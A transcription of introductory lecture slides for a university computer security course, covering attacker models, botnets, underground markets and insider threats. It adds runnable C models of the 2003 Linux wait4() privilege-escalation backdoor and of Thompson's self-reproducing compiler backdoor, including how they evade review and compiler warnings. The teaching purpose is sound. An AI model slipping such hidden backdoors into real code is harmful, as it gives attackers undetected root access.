Computer and Network Security

Transcription

CS 155, Spring 2010. Computer and Network Security. Dan Boneh and John Mitchell. /CS155

What's this course about?
- Intro to computer and network security
- Some challenging fun projects
  - Learn about attacks
  - Learn about preventing attacks
- Lectures on related topics
  - Application and operating system security
  - Web security
  - Network security
- Some overlap with CS241, Web Security
- Not a course on Cryptography (take CS255)

Organization
- Application and OS security (5 lectures)
  - Buffer overflow project
  - Vulnerabilities: control hijacking attacks, fuzzing
  - Prevention: System design, robust coding, isolation
- Web security (4 lectures)
  - Web site attack and defenses project
  - Browser policies, session mgmt, user authentication
  - HTTPS and web application security
- Network security (6 lectures)
  - Network traceroute and packet filtering project
  - Malware, botnets, DDoS, network security testing
- A few other topics
  - Cryptography (user perspective), digital rights management, final guest lecture, ...

General course info (see web)
- Prerequisite: Operating systems (CS140)
- Textbook: none, reading online
- Coursework: 3 projects, 2 homeworks, final exam
  - grade: 0.25 H + 0.5 P + 0.25 F
- Teaching assistants: Hariny Murli, Hristo Bojinov
- Occasional optional section
- Experiment this year: Live Meeting

What is security?
- System correctness: If user supplies expected input, system generates desired output
- Security: If attacker supplies unexpected input, system does not fail in certain ways

What is security?
- System correctness: Good input -> Good output
- Security: Bad input -> Bad output

What is security?
- System correctness: More features: better
- Security: More features: can be worse

Security properties
- Confidentiality: Information about system or its users cannot be learned by an attacker
- Integrity: The system continues to operate properly, only reaching states that would occur if there were no attacker
- Availability: Actions by an attacker do not prevent users from having access to use of the system

General picture (figure: System, Alice, Attacker)
Security is about
- Honest user (e.g., Alice, Bob, ...)
- Dishonest Attacker
How the Attacker
- Disrupts honest user's use of the system (Integrity, Availability)
- Learns information intended for Alice only (Confidentiality)

Network security (figure: System, Alice): Network Attacker intercepts and controls network communication

Web security (figure: System, Alice): Web Attacker sets up malicious site visited by victim; no control of network

Operating system security (figure: Alice): OS Attacker controls malicious files and applications

(figure: System, Alice, Attacker)
- Confidentiality: Attacker does not learn Alice's secrets
- Integrity: Attacker does not undetectably corrupt system's function for Alice
- Availability: Attacker does not keep system from being useful to Alice

Current Trends

Historical hackers (prior to 2000)
Profile: Male; Between 14 and 34 years of age; Computer addicted; No permanent girlfriend; No Commercial Interest!!!
Source: Raimund Genes

Typical Botherder: 0x80 (pronounced X-eighty)
Washington Post: Invasion of the Computer Snatchers
- High school dropout
- "... most of these people I infect are so stupid they really ain't got no business being on the Internet in the first place."
- Working hours: approx. 2 minutes/day to manage Botnet
- Monthly earnings: $6,800 on average
- Daily Activities: Chatting with people while his bots make him money
- Recently paid $800 for an hour alone in a VIP room with several dancers
Job Description:
- Controls 13,000 computers in more than 20 countries
- Infected Bot PCs download Adware then search for new victim PCs
- Adware displays ads and mines data on victim's online browsing habits
- Bots collect password, e-mail address, SS#, credit and banking data
- Gets paid by companies like TopConverting.com, GammaCash.com, Loudcash, or 180Solutions

Some things in the news
- Nigerian letter (419 Scams) still works: Michigan Treasurer Sends 1.2M USD of State Funds!!!
- Many zero-day attacks: Google, Excel, Word, Powerpoint, Office
- Criminal access to important devices
  - Numerous lost, stolen laptops, storage media, containing customer information
  - Second-hand computers (hard drives) pose risk
- Vint Cerf estimates ¼ of PCs on Internet are bots

Texas CISO, Feb 2010: Trends for 2010
- Malware, worms, and Trojan horses: spread by email, instant messaging, malicious or infected websites
- Botnets and zombies: improving their encryption capabilities, more difficult to detect
- Scareware: fake/rogue security software
- Attacks on client-side software: browsers, media players, PDF readers, etc.
- Ransom attacks: malware encrypts hard drives, or DDOS attack
- Social network attacks: Users' trust in online friends makes these networks a prime target.
- Cloud Computing: growing use will make this a prime target for attack.
- Web Applications: developed with inadequate security controls
- Budget cuts: problem for security personnel and a boon to cyber criminals.
Same list in Oklahoma Monthly Security Tips Newsletter

Trends (chart)

Operating system vulnerabilities (chart)

Reported Web Vulnerabilities "In the Wild" (chart). Data from aggregator and validator of NVD-reported vulnerabilities.

Web vs System vulnerabilities (chart; XSS peak marked)

Botnet Lifecycle (figure): Propagation; Compromised host activity; Network probe and other activity; Recognizable activity on newly infected host

Recent work on malware distribution
- Blogs are widely used
  - Blogs have automated Linkbacks
  - 184 Million blogs world-wide
  - 73% of internet users have read a blog
  - 50% post comments
- Facilitate cross-referencing
- Exploited by spammers
- We carried out a 1-year study
  - Analyzed 10 million spam samples
  - Gained insight on attacker's method of operation and resources
  - Propose a defense against blog spams

How big is the problem? (chart; Source: Akismet.com) One blog spam can reach thousands of users

Honeyblog Experiment
- Blog acting as potential target for spamming
- Hosted a real blog (dotclear) with a modified TrackBack mechanism
- Record TrackBacks
- Passive fingerprinting
- Sample the lure site

Malware installation
- TrojanDownloader:Win32/Zlob.gen!dll
- Trojan.Popuper.origin
- Downloader.Zlob.LI

Trackback spam example
Apparent Bayesian poisoning against spam filters:
[title] Please teacher hentai pics
[url] ex.html/
[excerpt] pics Please teacher hentai pics.
[blog name] Please teacher hentai pics

Number of notifications detected (chart; periods Mar-Apr 2007, May-Jun 2007, July 2007-Apr 2008)

Number of IP addresses (chart; periods Mar-Apr 2007, May-Jun 2007, July 2007-Apr 2008)

Origin (chart by period Mar-Apr 2007, May-Jun 2007, July 2007-Apr 2008; countries: Russia, USA, Germany, UK)

User agents reported to honeyblog (chart; periods Mar-Apr 2007, May-Jun 2007, July 2007-Apr 2008)

Web attack toolkit: MPack
- Basic setup
  - Toolkit hosted on web server
  - Infects pages on that server
  - Page visitors get infected
- Features
  - Customized: determines exploit on the fly, based on user's OS, browser, etc.
  - Easy to use: management console provides stats on infection rates
  - Customer care: toolkit can be purchased with one-year support contract!

SilentBanker (figure)
- Proxy intercepts request and adds fields
- Bank sends login page needed to log in
- When user submits information, also sent to attacker
Credit: Zulfikar Ramzan

Estonia: network attack. Jaak Aaviksoo, Minister of Defence

Steal cars with a laptop
NEW YORK - Security technology created to protect luxury vehicles may now make it easier for tech-savvy thieves to drive away with them. In April '07, high-tech criminals made international headlines when they used a laptop and transmitter to open the locks and start the ignition of an armor-plated BMW X5 belonging to soccer player David Beckham, the second X5 stolen from him using this technology within six months. Beckham's BMW X5s were stolen by thieves who hacked into the codes for the vehicles' RFID chips.

iPhone attack (summer 2007)
- iPhone Safari downloads malicious web page
  - Arbitrary code is run with administrative privileges
  - Can read SMS log, address book, call history, other data
  - Can perform physical actions on the phone: system sound and vibrate the phone for a second; could dial phone numbers, send text messages, or record audio (as a bugging device)
  - Transmit collected data over network to attacker
See http://www.securityevaluators.com/iphone/

iPhone security measures
- "Reduced attack surface"
  - Stripped down and customized version of Mac OS X; does not have common binaries such as bash, ssh, or even ls
  - MobileSafari: many features of Safari have been removed; no Flash plug-in, many file types cannot be downloaded
- Some internal protection
  - If USB syncing with iTunes, file system cannot be mounted
  - File system accessible to iTunes is chroot'ed
- Weak security architecture
  - All processes of interest run with administrative privileges
  - iPhone does not utilize some widely accepted practices
    - Address randomization: each time a process runs, the stack, heap, and executable code are located at precisely the same spot in memory
    - Non-executable heaps: buffer overflow on heap can write executable instructions

Analysis methods
- Extract and statically analyze binaries, using jailbreak and iPhoneInterface
- Audit related open-source code: MobileSafari and MobileMail applications are based on the open source WebKit project
- Dynamic analysis, or "fuzzing": sending malformed data to cause a fault or crash; look at error messages, memory dump, etc.
MobileSafari attack discovered using fuzzing. What kind of vulnerability do you think it was?

Suggestions for improvement
- Run applications as an unprivileged user: this would result in a successful attacker only gaining the rights of this unprivileged user.
- chroot apps to prevent access to unrelated data: MobileSafari does not need access to email or SMS msgs; MobileMail does not need access to browsing history
- Add heap and stack address randomization: this will serve to make the development of exploits for vulnerabilities more difficult
- Memory protection: no pages both writable and executable
See giphone.pdf

(figure) Spam service; Rent-a-bot; Cash-out; Pump and dump; Botnet rental

Underground goods and services

Rank  Last  Goods and services             Current  Previous  Prices
 1     2    Bank accounts                    22%      21%     $10-1000
 2     1    Credit cards                     13%      22%     $0.40-$20
 3     7    Full identity                     9%       6%     $1-15
 4    N/R   Online auction site accounts      7%      N/A     $1-8
 5     8    Scams                             7%       6%     $2.50/wk-$50/wk (hosting); $25 design
 6     4    Mailers                           6%       8%     $1-10
 7     5    Email addresses                   5%       6%     $0.83-$10/MB
 8     3    Email passwords                   5%       8%     $4-30
 9    N/R   Drop (request or offer)           5%      N/A     10-50% of drop amount
10     6    Proxies                           5%       6%     $1.50-$30

Credit: Zulfikar Ramzan

Why are there security vulnerabilities?
- Lots of buggy software. Why do programmers write insecure code?
- Awareness is the main issue
- Some contributing factors
  - Few courses in computer security
  - Programming text books do not emphasize security
  - Few security audits
  - C is an unsafe language
  - Programmers have many other things to worry about
  - Legacy software (some solutions, e.g. Sandboxing)
  - Consumers do not care about security
  - Security is expensive and takes time

If you remember only one thing from this course:
A vulnerability that is "too complicated for anyone to ever find" will be found!
We hope you remember more than one thing

Ethical use of security information
- We discuss vulnerabilities and attacks
  - Most vulnerabilities have been fixed
  - Some attacks may still cause harm
  - Do not try these at home or anyplace else
- Purpose of this class
  - Learn to prevent malicious attacks
  - Use knowledge for good purposes

Law enforcement
- David L. Smith: Melissa virus: 5 years in prison, 150K fine
- Ehud Tenenbaum ("The Analyzer"): Broke into US DoD computers; 6 mos service, suspended prison, 18K fine
- Dmitry Sklyarov: Broke Adobe ebooks; Prosecuted under DMCA

Difficult problem: insider threat
- Easy to hide code in large software packages
  - Virtually impossible to detect back doors
  - Skill level needed to hide malicious code is much lower than needed to find it
- Anyone with access to development environment is capable
slides: Avi Rubin

Example insider attack
Hidden trap door in Linux, Nov 2003
- Allows attacker to take over a computer
- Practically undetectable change
- Uncovered by anomaly in CVS usage
Inserted line in wait4():

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;

- Looks like a standard error check
- Anyone see the problem?
See: http://lwn.net/Articles/57135/
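Added example (not from the slide and not kernel source): the inserted line transplanted into a small user-space C model so its effect can be run and checked. The kernel's __WCLONE, __WALL, EINVAL and task_struct are replaced by assumed stand-ins named WCLONE_FLAG, WALL_FLAG, EINVAL_ERR and struct task (the flag values are the Linux ones; nothing here touches a real kernel). The point it makes concrete: the single '=' where '==' was expected turns the "error check" into an assignment of uid 0 to the calling task, the assignment evaluates to 0 so the error path never fires, and the extra parentheses around it are exactly what keeps gcc's -Wparentheses from flagging an assignment used as a truth value.

```c
#include <stdio.h>

/* Assumed stand-ins for kernel definitions (example code, not kernel source).
 * The kernel names are __WCLONE and __WALL; those use a reserved prefix, so
 * the copies here are renamed. Values match <linux/wait.h>. */
#define WCLONE_FLAG 0x80000000u
#define WALL_FLAG   0x40000000u
#define EINVAL_ERR  22

/* Minimal stand-in for task_struct: only the field the backdoor touches. */
struct task {
    unsigned int uid;
};

/* The check as committed to the CVS mirror: '=' where '==' belongs.
 * "current->uid = 0" stores root's uid into the calling task and evaluates
 * to 0, so the && is false, retval stays 0 and the call proceeds normally.
 * Any unprivileged process calling wait4() with exactly these two flags
 * leaves the call as root. The redundant parentheses around the assignment
 * also silence gcc's -Wparentheses "assignment used as truth value" hint. */
int backdoored_check(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (current->uid = 0))
        retval = -EINVAL_ERR;
    return retval;
}

/* What the line pretends to be: reject that flag combination for root. */
int honest_check(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (WCLONE_FLAG | WALL_FLAG)) && (current->uid == 0))
        retval = -EINVAL_ERR;
    return retval;
}

/* Simulate an unprivileged task (uid 1000, a constructed value) calling
 * wait4 with the trigger flags through the given check; returns 1 if the
 * task ends up with uid 0. */
int escalates(int (*check)(struct task *, unsigned int))
{
    struct task caller = { 1000 };
    (void)check(&caller, WCLONE_FLAG | WALL_FLAG);
    return caller.uid == 0;
}

int main(void)
{
    printf("backdoored check escalates: %d\n", escalates(backdoored_check));
    printf("honest check escalates:     %d\n", escalates(honest_check));
    return 0;
}
```

Compile the block with -Wall and note that gcc stays silent on backdoored_check; the one-character diff only stands out to a reader who expects an error check to compare rather than store.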

Example #2
Rob Harris case: slot machines
- an insider: worked for Gaming Control Board
- Malicious code in testing unit
  - when testers checked slot machines, downloaded malicious code to slot machine
  - was never detected
  - special sequence of coins activated "winning mode"
- Caught when greed sparked investigation: $100,000 jackpot

Example #3
Breeders' Cup race
- Upgrade of software to phone betting system
- Insider, Christopher Harn, rigged software
- Allowed him and accomplices to call in, change the bets that were placed, undetectable
- Caught when got greedy: won $3 million
See: /aa110102a.htm

Software dangers
- Software is complex: top metric for measuring # of flaws is lines of code
- Windows Operating System: tens of millions of lines of code; new "critical" security bug announced every week
- Unintended security flaws unavoidable
- Intentional security flaws undetectable

Ken Thompson
What code can we trust?
- Consider "login" or "su" in Unix
  - Is RedHat binary reliable?
  - Does it send your passwd to someone?
- Can't trust binary so check source, recompile
  - Read source code or write your own
  - Does this solve problem?
Reflections on Trusting Trust, http://www.acm.org/classics/sep95/

Compiler backdoor
- This is the basis of Thompson's attack
  - Compiler looks for source code that looks like login program
  - If found, insert login backdoor (allow special user to log in)
- How do we solve this? Inspect the compiler source

C compiler is written in C
Change compiler source S:

    compiler(S) {
        if (match(S, "login-pattern")) {
            compile(login-backdoor)
            return
        }
        if (match(S, "compiler-pattern")) {
            compile(compiler-backdoor)
            return
        }
        ....  /* compile as usual */
    }

Clever trick to avoid detection
- Compile this compiler and delete backdoor tests from source
  - Someone can compile standard compiler source to get new compiler, then compile login, and get login with backdoor
- Simplest approach will only work once
  - Compiling the compiler twice might lose the backdoor
  - But can make code for compiler backdoor output itself (Can you write a program that prints itself? Recursion thm)
- Read Thompson's article: short, but requires thought
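Added example, written for this transcription and not taken from Thompson's paper or the slide pseudocode above: a text-level model in C of the two-pattern compiler and of the "outputs itself" trick that keeps the backdoor alive across a rebuild from clean source. "Compilation" here is the identity on text (an assumed toy), the login and compiler patterns are assumed markers (LOGIN_PATTERN, COMPILER_PATTERN), the password "joshua" is a constructed payload, and the sample sources are constructed. The model does not execute what it emits; what it shows is that the emitted compiler carries a complete copy of the injection logic, produced by printing a format string with itself as an argument, so a second pass over that output yields the same payload again even though the original compiler source never contained it.

```c
#include <stdio.h>
#include <string.h>

/* Assumed toy markers the trojaned compiler looks for (example only). */
#define LOGIN_PATTERN    "int login("
#define COMPILER_PATTERN "compile_as_usual("

/* Payload for the login program: accept a fixed, constructed password. */
static const char LOGIN_BACKDOOR[] =
    "    if (strcmp(pw, \"joshua\") == 0) return 1;   /* inserted */\n";

/* Payload for the compiler. It is a format string: printing it with
 * snprintf(buf, n, INJECT, 34, INJECT, 34) substitutes a double quote
 * (ASCII 34), the template itself, and another quote for %c%s%c, so the
 * emitted text carries a full copy of its own generator. That is the
 * "program that prints itself" step; without it the backdoor would be
 * gone after the second rebuild from clean compiler source. The markers
 * are referenced by name so the payload does not itself match them. */
static const char INJECT[] =
    "    /* inserted: self-propagating compiler backdoor */\n"
    "    static const char INJECT[] = %c%s%c;\n"
    "    if (strstr(src, LOGIN_PATTERN)) append(out, n, LOGIN_BACKDOOR);\n"
    "    if (strstr(src, COMPILER_PATTERN)) {\n"
    "        char t[4096]; snprintf(t, sizeof t, INJECT, 34, INJECT, 34);\n"
    "        append(out, n, t);\n"
    "    }\n";

/* Bounded append onto a NUL-terminated buffer of capacity n. */
static void append(char *out, size_t n, const char *s)
{
    size_t used = strlen(out);
    if (used + 1 < n)
        strncat(out, s, n - used - 1);
}

/* The honest compiler of this text model: output is the input unchanged. */
size_t clean_compile(const char *src, char *out, size_t n)
{
    out[0] = '\0';
    append(out, n, src);
    return strlen(out);
}

/* The trojaned compiler: compile as usual, then act on the two patterns. */
size_t trojan_compile(const char *src, char *out, size_t n)
{
    clean_compile(src, out, n);
    if (strstr(src, LOGIN_PATTERN))
        append(out, n, LOGIN_BACKDOOR);
    if (strstr(src, COMPILER_PATTERN)) {
        char t[4096];
        snprintf(t, sizeof t, INJECT, 34, INJECT, 34);
        append(out, n, t);
    }
    return strlen(out);
}

/* Constructed clean sources: neither contains any backdoor text. */
static const char LOGIN_SRC[] =
    "int login(const char *user, const char *pw) {\n"
    "    return check_password(user, pw);\n"
    "}\n";

static const char COMPILER_SRC[] =
    "size_t compile(const char *src, char *out, size_t n) {\n"
    "    return compile_as_usual(src, out, n);\n"
    "}\n";

/* Inspection helpers: does the emitted text carry the payloads? */
int login_is_backdoored(const char *binary)  { return strstr(binary, "joshua") != NULL; }
int compiler_is_trojaned(const char *binary) { return strstr(binary, INJECT) != NULL; }

int main(void)
{
    char stage1[8192], login[8192], stage2[8192];
    trojan_compile(COMPILER_SRC, stage1, sizeof stage1); /* clean source in, trojan out */
    trojan_compile(LOGIN_SRC, login, sizeof login);
    trojan_compile(stage1, stage2, sizeof stage2);       /* rebuild: payload reappears */
    printf("compiler trojaned: %d, login backdoored: %d, survives rebuild: %d\n",
           compiler_is_trojaned(stage1), login_is_backdoored(login),
           compiler_is_trojaned(stage2));
    return 0;
}
```

The format-string quine is the whole trick: INJECT contains "%c%s%c" exactly where a copy of INJECT must appear in the output, and printing it with itself as the %s argument closes the loop. Inspecting COMPILER_SRC or LOGIN_SRC finds nothing, which is the point the slide makes about trusting source you did not also build the toolchain for.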

Social engineering
- Many attacks don't use computers
  - Call system administrator
  - Dive in the dumpster
- Online versions
  - send trojan in email
  - picture or movie with malicious code
